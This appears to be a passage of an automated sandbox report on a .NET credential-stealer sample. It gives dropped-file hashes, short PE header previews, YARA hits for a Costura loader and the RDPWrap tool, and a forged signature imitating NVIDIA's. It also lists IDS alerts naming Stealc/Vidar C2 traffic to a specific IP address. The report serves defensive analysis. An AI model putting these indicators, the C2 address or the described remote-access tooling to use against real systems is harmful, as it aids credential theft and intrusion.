                                                                                    SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                    Malicious:true
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):34725
                                                                                    Entropy (8bit):5.398399394801287
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:udpqme0Ih3tAA6WGA2fcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2Sd:ud8me0Ih3tAA6WGA2FhTBv++nIjBtPF8
                                                                                    MD5:6775E4FEB45B8D16FDB17414891CF367
                                                                                    SHA1:72326431638A1A387C8D6DC901E323170EB53AEC
                                                                                    SHA-256:03967D1239EC4025F44AB6FC4AFF59EA88F514E8E666961C77E8E475989F5B4E
                                                                                    SHA-512:68E90B9D90F56CCDB41DE7D97CF522673F32296DCCF2244341C6836C035212288DBA2FD24DA93D78A1EE50B6DD17A3C2B050CCD9A881BF18BEA48405728CE17A
                                                                                    Malicious:false
                                                                                    Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://5.75.211.162|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link href
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):73216
                                                                                    Entropy (8bit):7.6619916056452
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:Cnxe3ckl/Q2slz7jHGZI7rBrWMwgN3R29suranxH2ufS/TktxF3s2O6kiz:Cnx0I26z/8uz22gaxH2zT6xFnO6Jz
                                                                                    MD5:8C46913FBA5CA6A0CB8C4E839EF3A3AE
                                                                                    SHA1:95EFA5E6909359A0D30E95B8EEAD7D0116F8B693
                                                                                    SHA-256:1268E903700241813C51A97AF8513C97306FCDC6987F4C7E2E0EC02EB71BD6CB
                                                                                    SHA-512:B011191A827D75C9018D50BA3DF0BA045BB4EF8000711DCDD1B117F9D257B2FE1F9722C38FE61BCABCCA58DBE281FD7605F43CA3B339B428BCC6F5C3A5B8EC6E
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66f5d9ab0d4c7_rdp[1].exe, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............."... ...@....@.. ....................................`..................................!..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................!......H.......t...D%...........,...............................................("...*..(....*6.|.....(0...*Vs1...r...p(....(2...*Js1....s3....(4...*Zr...p(....(.....oE...*..(N...:....*r...p(.....r&..p(....(O...(....*.r...p(....(....r...p(....oE...:....r...p(....*r...p(....*.rM..p(.....{....rM..p(....(R...oS...(T...*b.:....r...p(....*.oU...*.0..n.........(.....s....(....r...po....(.....s.......o.......o.......o......o..........io.......o.....(......o......+...*...0../.........(....}
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):413224
                                                                                    Entropy (8bit):7.989371105778008
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:WFVCXJfc+aP2LQB0g7YUsKEJGxhimXJEO:MCX2d+LQqbKEJQim5t
                                                                                    MD5:F73186DF5A030CF7F186B0737C3AF1F7
                                                                                    SHA1:D15E45FEEFBBC010DB92AE897D80BC7419C0D046
                                                                                    SHA-256:05C67A9765FE1EBEBCEDAEE376F87A803D7CD37E6C5C19F7D336C2F14A4EF207
                                                                                    SHA-512:A6E4D6E34748FA8FB9153E2104CF49CC36AF9B22E29C8DF050DE0DB4E14E9DD18ED178B4BBACD6289A0A55B465C996FB931799BA970DFE559C85215DB7E31DF1
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 42%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................><... ...@....@.. ....................................`..................................;..S....@...............(..(&...`.......:............................................... ............... ..H............text...D.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B................ <......H........*..0...............................................................^.8=..Q..v A.3[R.J*.._....f..9.\l..vC#SsnB~.E..~.i..7.}+.V...#..8..f.#XW....b...(..............<O.......1.$.=UN8.)..LL....(K....,r.....%9.L.Y.=0..T4.&.....d....(U....'="...(>.d..+..92...p8.1..Pa\q....]X./a.@0C.PQ...B...v..6....le2....4I3.......P.C:...v.}.Q.wp..S(A.Qg.'..N.._X.mvg...J/J6.^...D^MI.O4.5.+....e...^.DIf?.1$;7..x...M..q.q.{'...I..CN.n...a.P.8....!0..\.^.'...3.._....,\
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):385064
                                                                                    Entropy (8bit):7.98819744237574
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:bymTbhLAP1TbvdrXIFTjCUBfmfq1VpIe+kUWLD38DEVhyF2tLooTPbJBJaINPK7z:bymTiJVr4FTjCUVsq1we++D3FU2CW7aT
                                                                                    MD5:47697A60A96C5ADEF362D8DA9A274B7D
                                                                                    SHA1:16DBC512F121C27E2CB48A61D6DCF166AA792E0D
                                                                                    SHA-256:63D86693917598DF88D518C057C7680B5BD2DE9ADD384425F81EAD95EEE18DBA
                                                                                    SHA-512:4F18DB753FBD9F08842630DD2AC97DC6B368269C80DFC8A2F880BAA80010DB013C8168A6C19465F5D843AE135B162A63EB2DC1C48EA93C5B255868C77C591A17
                                                                                    Malicious:true
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f............................>.... ........@.. ....................... ............`.....................................S.......................(&........................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H...........0............................................................y.YYl.v^...5f.H$...../.W.a.zz..5O..7...f..S.l\.RB.k.5...Eq.....v......B...f............9v...;(.F. .J*.g.i..(....B.B.M.s...<..ub. .l.].....Qg...\.Bc*.....$........fVGZ.........8....lH;!..."......p.UO.8.Y"....d..\...dD".sm}.c#.?.4?..Y#.......0....VS..X..|....G...g.:!rM[~...e.Bp..bz.{....`5......|..|b.O....G......A.h...}s8...W.PaG?...U.K%.9].|.....wc\|..B..K=.D..u..G.@..q...y0g...5..i.......<
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):34725
                                                                                    Entropy (8bit):5.398732403256842
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:udpqme0Ih3tAA6WGA2fcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2S0:ud8me0Ih3tAA6WGA2FhTBv++nIjBtPF9
                                                                                    MD5:CB12F6F42CF7B33DEB2D70060570ACE7
                                                                                    SHA1:57CA401FDE4DDD338DC1F816B2DF7F1577488B78
                                                                                    SHA-256:C4CF334D29300CB803C0C5FBD90562304CBD0298FB6292E16D16B5AA1937666D
                                                                                    SHA-512:DF0F93651FE30945913DA527D01745759F87A5F2D00EB4F3748E7725025313DD46BB65AB550BC9D3A513E8B0AB6893CD2916B3B33A17AA962CBA9CB62C0D3C25
                                                                                    Malicious:false
                                                                                    Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://5.75.211.162|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link href
                                                                                    Process:C:\ProgramData\AFHDGDGIID.exe
                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):1785344
                                                                                    Entropy (8bit):6.646511331349125
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:+rKxoVT2iXc+IZP+6WiaTAsN/3ebTvK+63CWH8iA/iD2hgPjcC8SVdKumYr7:vHZGpdqYH8ia6GcKuR7
                                                                                    MD5:C213162C86BB943BCDF91B3DF381D2F6
                                                                                    SHA1:8EC200E2D836354A62F16CDB3EED4BB760165425
                                                                                    SHA-256:AC91B2A2DB1909A2C166E243391846AD8D9EDE2C6FCFD33B60ACF599E48F9AFC
                                                                                    SHA-512:B3EAD28BB1F4B87B0C36C129864A8AF34FC11E5E9FEAA047D4CA0525BEC379D07C8EFEE259EDE8832B65B3C03EF4396C9202989249199F7037D56439187F147B
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 47%
                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...#.CZ.................4..........<7.......P....@..............................................@...................................`...{.......................^...................................................................................text... ........................... ..`.itext..|....0... .................. ..`.data...x....P.......8..............@....bss.....O...p.......L...................idata...............L..............@....tls.................`...................rdata...............`..............@..@.reloc...^.......`...b..............@..B.rsrc....{...`...|..................@..@.............p......................@..@................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):1048575
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:UiiJ:7iJ
                                                                                    MD5:6A2B87E137DC5B44FD19F7CE501C41B5
                                                                                    SHA1:CE31560D426B78BD969EF6080F2B65743CB5807E
                                                                                    SHA-256:76CE63F18F7A9ADBBDF14B4B34933EEE006AA1B67DAAE3AFBB7C2C70FB9D6E3E
                                                                                    SHA-512:74379A05EAA9DA82BAF70A6465445F0838DC024F6E56E04120316A2FCDC3CF9FFB85F770586F9D3631783C00D013FA7CE04CF56772C954F5FBF4BFC52829B60D
                                                                                    Malicious:false
                                                                                    Preview:GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
                                                                                    Process:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):37376
                                                                                    Entropy (8bit):5.7181012847214445
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                                                                                    MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                                                                                    SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                                                                                    SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                                                                                    SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\SysWOW64\netsh.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):7
                                                                                    Entropy (8bit):2.2359263506290326
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:t:t
                                                                                    MD5:F1CA165C0DA831C9A17D08C4DECBD114
                                                                                    SHA1:D750F8260312A40968458169B496C40DACC751CA
                                                                                    SHA-256:ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
                                                                                    SHA-512:052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
                                                                                    Malicious:false
                                                                                    Preview:Ok.....
                                                                                    File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Entropy (8bit):7.989371105778008
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:file.exe
                                                                                    File size:413'224 bytes
                                                                                    MD5:f73186df5a030cf7f186b0737c3af1f7
                                                                                    SHA1:d15e45feefbbc010db92ae897d80bc7419c0d046
                                                                                    SHA256:05c67a9765fe1ebebcedaee376f87a803d7cd37e6c5c19f7d336c2f14a4ef207
                                                                                    SHA512:a6e4d6e34748fa8fb9153e2104cf49cc36af9b22e29c8df050de0db4e14e9dd18ed178b4bbacd6289a0a55b465c996fb931799ba970dfe559c85215db7e31df1
                                                                                    SSDEEP:12288:WFVCXJfc+aP2LQB0g7YUsKEJGxhimXJEO:MCX2d+LQqbKEJQim5t
                                                                                    TLSH:CE94238986C98391EC7CBC347516D75621F1B7E5EC131E89B06A70F9E8CD3A025B43AE
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................><... ...@....@.. ....................................`................................
                                                                                    Icon Hash:90cececece8e8eb0
                                                                                    Entrypoint:0x463c3e
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:true
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows cui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x66F5DAED [Thu Sep 26 22:06:37 2024 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                    Signature Valid:false
                                                                                    Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                    Error Number:-2146869232
                                                                                    Not Before, Not After
                                                                                    • 13/01/2023 00:00:00 16/01/2026 23:59:59
                                                                                    Subject Chain
                                                                                    • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                                                                                    Version:3
                                                                                    Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
                                                                                    Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
                                                                                    Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
                                                                                    Serial:0997C56CAA59055394D9A9CDB8BEEB56
                                                                                    Instruction
                                                                                    jmp dword ptr [00402000h]
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x63be80x53.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000x5c8.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x628000x2628
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x660000xc.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x63ab00x1c.text
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x20000x61c440x61e00fcfe34140c87b93a1c1b25751c264e85False0.9938138569604087data7.9958244524809645IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0x640000x5c80x600db1daa9db276719b7dce2f7fee59adb7False0.4361979166666667data4.115782972549961IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0x660000xc0x200668ddc03321cdfb17f8be719cbc539e8False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_VERSION0x640a00x334data0.4426829268292683
                                                                                    RT_MANIFEST0x643d80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                                                                    DLLImport
                                                                                    mscoree.dll_CorExeMain
                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2024-09-27T00:14:28.857369+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497405.75.211.162443TCP
                                                                                    2024-09-27T00:14:30.047301+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497415.75.211.162443TCP
                                                                                    2024-09-27T00:14:31.424414+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497425.75.211.162443TCP
                                                                                    2024-09-27T00:14:32.132983+02002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.4497425.75.211.162443TCP
                                                                                    2024-09-27T00:14:32.792950+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497435.75.211.162443TCP
                                                                                    2024-09-27T00:14:33.488655+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config15.75.211.162443192.168.2.449743TCP
                                                                                    2024-09-27T00:14:34.149527+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497445.75.211.162443TCP
                                                                                    2024-09-27T00:14:34.838625+02002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M115.75.211.162443192.168.2.449744TCP
                                                                                    2024-09-27T00:14:35.562421+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497455.75.211.162443TCP
                                                                                    2024-09-27T00:14:36.581589+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497465.75.211.162443TCP
                                                                                    2024-09-27T00:14:39.706116+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497475.75.211.162443TCP
                                                                                    2024-09-27T00:14:40.918817+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497485.75.211.162443TCP
                                                                                    2024-09-27T00:14:41.930442+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497495.75.211.162443TCP
                                                                                    2024-09-27T00:14:43.074730+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497505.75.211.162443TCP
                                                                                    2024-09-27T00:14:44.107022+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497515.75.211.162443TCP
                                                                                    2024-09-27T00:14:45.825014+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497525.75.211.162443TCP
                                                                                    2024-09-27T00:14:47.539254+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497535.75.211.162443TCP
                                                                                    2024-09-27T00:14:49.077562+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497545.75.211.162443TCP
                                                                                    2024-09-27T00:14:50.619616+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497555.75.211.162443TCP
                                                                                    2024-09-27T00:14:52.789705+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497565.75.211.162443TCP
                                                                                    2024-09-27T00:14:55.766830+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497575.75.211.162443TCP
